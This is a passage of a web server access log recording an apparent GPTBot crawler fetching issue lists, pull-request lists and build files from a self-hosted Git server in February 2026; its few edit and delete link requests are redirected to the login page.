(KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:45:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:45:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10073] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:45:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10252] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:45:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10241] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:45:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10073] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:45:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:45:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10079] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:45:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:45:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10252] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:18:45:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10246] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:45:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10246] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:45:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10249] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:45:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:45:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10248] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:45:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10250] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:45:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:18:45:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10247] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:18:45:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:45:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10246] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:18:45:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10071] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:45:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10247] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:45:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10075] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:45:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:45:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:45:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:45:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16401] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build" +[17/Feb/2026:18:45:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 11146] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build" +[17/Feb/2026:18:45:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 15828] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build" +[17/Feb/2026:18:45:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:45:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:18:45:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:18:45:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs?display=rendered" [Client 74.7.227.38] [Length 11258] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" +[17/Feb/2026:18:45:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10143] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:45:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=open&type=all" +[17/Feb/2026:18:45:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:45:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:45:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/Makefile" +[17/Feb/2026:18:45:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/Makefile" +[17/Feb/2026:18:45:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/TestApp" +[17/Feb/2026:18:45:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/TestApp" +[17/Feb/2026:18:45:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/Makefile" +[17/Feb/2026:18:45:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/Makefile" +[17/Feb/2026:18:45:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/TestApp" +[17/Feb/2026:18:45:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/TestApp" +[17/Feb/2026:18:45:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:18:45:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:18:45:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:18:45:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:18:45:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11258] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:18:45:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 5210] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/Makefile" +[17/Feb/2026:18:45:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 897] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/TestApp" +[17/Feb/2026:18:45:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 4636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:18:45:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 28192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/TestApp" +[17/Feb/2026:18:45:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 16403] [Gzip 9.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:18:45:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:45:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:45:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 991] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:18:45:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 9871] [Gzip 